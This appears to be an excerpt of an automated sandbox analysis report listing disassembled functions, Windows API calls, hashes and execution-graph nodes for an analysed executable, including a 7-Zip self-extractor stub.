                                                                      Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                      • memcpy.MSVCRT(00000000,005F9D00,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                      • ??3@YAXPAX@Z.MSVCRT(005F9D00,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                      • String ID:
                                                                      • API String ID: 3462485524-0
                                                                      • Opcode ID: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                                      • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                      • Opcode Fuzzy Hash: 897b2a2a9d8dc1b2bf7e5fef47a2e08c6fc8b2b3bd591012da5b500735fb1ac7
                                                                      • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                      Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                      • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                      • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                      • String ID:
                                                                      • API String ID: 3043669009-0
                                                                      • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                      • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                                      • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                      • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                      Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                      • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                      • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                      • DeleteObject.GDI32(00000000), ref: 00407126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                      • String ID:
                                                                      • API String ID: 1900162674-0
                                                                      • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                      • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                      • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                      • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                      Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                      • GetClientRect.USER32(?,?), ref: 004085C2
                                                                      • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                        • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                      • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                      • String ID:
                                                                      • API String ID: 3015594791-0
                                                                      • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                      • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                      • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                      • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                      Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                      • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@TextWindow$Length
                                                                      • String ID:
                                                                      • API String ID: 2308334395-0
                                                                      • Opcode ID: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
                                                                      • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                      • Opcode Fuzzy Hash: a65fd38771d47db4a5adb3f7e2ba21dcddc91d0fba744515c2fd594643e60546
                                                                      • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                      Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                      • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFontIndirectItemMessageObjectSend
                                                                      • String ID:
                                                                      • API String ID: 2001801573-0
                                                                      • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                      • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                      • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                      • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                      Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00401D92
                                                                      • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ClientScreen$ParentRectWindow
                                                                      • String ID:
                                                                      • API String ID: 2099118873-0
                                                                      • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                      • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                      • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                      • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                      Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID: (nA${D@
                                                                      • API String ID: 613200358-2741945119
                                                                      • Opcode ID: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                                      • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                      • Opcode Fuzzy Hash: 295e2b9914260187c8108fb23f9c7c95c3fe5021d1292d3f98e2afc996a1852c
                                                                      • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                      Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                        • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                        • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                        • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$??3@$memmove
                                                                      • String ID: {D@
                                                                      • API String ID: 4294387087-1160549682
                                                                      • Opcode ID: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                                      • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                      • Opcode Fuzzy Hash: a10cea0c6081034431b1deab0df680eb74f764079fba132a1b5611795ca3c1c0
                                                                      • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                      Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: _wtol
                                                                      • String ID: GUIFlags$^L@
                                                                      • API String ID: 2131799477-2609156739
                                                                      • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                      • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                      • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                      • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                      Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@wsprintf
                                                                      • String ID: (%d%s)
                                                                      • API String ID: 3815514257-2087557067
                                                                      • Opcode ID: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                                      • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                      • Opcode Fuzzy Hash: 4b7a2db08cb0ab3113720472f879d4b427a226093fb12d19f20ff2d4f109d252
                                                                      • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                      Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow$Length
                                                                      • String ID: t1@
                                                                      • API String ID: 1006428111-473456572
                                                                      • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                      • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                      • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                      • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                      Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: 7-Zip SFX$Could not allocate memory
                                                                      • API String ID: 2030045667-3806377612
                                                                      • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                      • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                      • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                      • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                      Execution Graph

                                                                      Execution Coverage:3.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:23.2%
                                                                      Total number of Nodes:1068
                                                                      Total number of Limit Nodes:28
                                                                      execution_graph 23055 7ff7e50a3430 201 API calls 23056 7ff7e5094003 222 API calls 3 library calls 23058 7ff7e507a830 91 API calls 2 library calls 23061 7ff7e509a420 15 API calls _getdrive 23062 7ff7e5091620 150 API calls 5 library calls 23066 7ff7e507d820 8 API calls _RunAllParam 23068 7ff7e5082a50 SetServiceStatus 23069 7ff7e5071450 RaiseException 23070 7ff7e50a5040 SetRectRgn CombineRgn DeleteObject 23071 7ff7e50a1440 126 API calls _RunAllParam 23074 7ff7e512c034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23075 7ff7e5094003 240 API calls 3 library calls 23076 7ff7e5094003 208 API calls 2 library calls 23078 7ff7e5082a6e SetServiceStatus SetEvent SetEvent 23079 7ff7e5098a70 133 API calls 4 library calls 23081 7ff7e5094003 236 API calls 2 library calls 23084 7ff7e5071a70 CloseClipboard 23085 7ff7e5099060 129 API calls 23087 7ff7e50a5a60 8 API calls 23088 7ff7e50a3460 122 API calls 2 library calls 23091 7ff7e5073e60 34 API calls 23092 7ff7e5076060 112 API calls 2 library calls 23094 7ff7e5075a60 25 API calls 2 library calls 23096 7ff7e508a890 97 API calls 2 library calls 23099 7ff7e5099480 117 API calls _RunAllParam 23100 7ff7e50d5e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23101 7ff7e509a085 98 API calls 23104 7ff7e5082880 196 API calls 23105 7ff7e507d880 6 API calls _RunAllParam 23110 7ff7e507a6b0 93 API calls 2 library calls 23112 7ff7e5083cb0 RegCreateKeyExA RegOpenKeyExA RegDeleteValueA RegCloseKey RegCloseKey 23113 7ff7e50834b0 13 API calls _getdrive 21894 7ff7e50988a0 getpeername inet_ntoa 21906 7ff7e51292a4 21894->21906 21899 7ff7e509893d InitializeCriticalSection 21932 7ff7e51079a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 21899->21932 21901 7ff7e509895e 21902 7ff7e5098988 21901->21902 21928 7ff7e508f840 21901->21928 21933 7ff7e5127220 21902->21933 21904 7ff7e50989c3 21907 7ff7e51292bb malloc 21906->21907 21912 7ff7e5098913 21906->21912 21944 7ff7e5128c34 21907->21944 21911 7ff7e51292e3 21911->21912 21913 7ff7e51292ec 21911->21913 21916 7ff7e5127978 21912->21916 21962 7ff7e5134930 16 API calls malloc 21913->21962 21919 7ff7e5127983 21916->21919 21917 7ff7e5128c34 malloc 70 API calls 21917->21919 21918 7ff7e5098930 21918->21899 21918->21901 21919->21917 21919->21918 21920 7ff7e5133238 _callnewh DecodePointer 21919->21920 21923 7ff7e51279a2 21919->21923 21920->21919 21921 7ff7e51279f3 22020 7ff7e512755c 70 API calls std::exception::operator= 21921->22020 21923->21921 22019 7ff7e5127b94 80 API calls 21923->22019 21924 7ff7e5127a04 22021 7ff7e5132950 21924->22021 21927 7ff7e5127a1a 21929 7ff7e508f885 21928->21929 22024 7ff7e5107b50 EnterCriticalSection 21929->22024 21931 7ff7e508f926 21931->21902 21932->21901 21934 7ff7e5127229 21933->21934 21935 7ff7e5127234 21934->21935 21936 7ff7e51329e4 RtlCaptureContext RtlLookupFunctionEntry 21934->21936 21935->21904 21937 7ff7e5132a69 21936->21937 21938 7ff7e5132a28 RtlVirtualUnwind 21936->21938 21939 7ff7e5132a8b IsDebuggerPresent 21937->21939 21938->21939 22080 7ff7e513dc94 21939->22080 21941 7ff7e5132aea SetUnhandledExceptionFilter UnhandledExceptionFilter 21942 7ff7e5132b08 _getdrive 21941->21942 21943 7ff7e5132b12 GetCurrentProcess TerminateProcess 21941->21943 21942->21943 21943->21904 21945 7ff7e5128cc8 21944->21945 21957 7ff7e5128c4c 21944->21957 21946 7ff7e5133238 _callnewh DecodePointer 21945->21946 21947 7ff7e5128ccd 21946->21947 21949 7ff7e512ffc8 _errno 69 API calls 21947->21949 21948 7ff7e5128c84 HeapAlloc 21951 7ff7e5128cbd 21948->21951 21948->21957 21949->21951 21951->21912 21961 7ff7e5127de8 70 API calls 2 library calls 21951->21961 21952 7ff7e5128cad 21968 7ff7e512ffc8 21952->21968 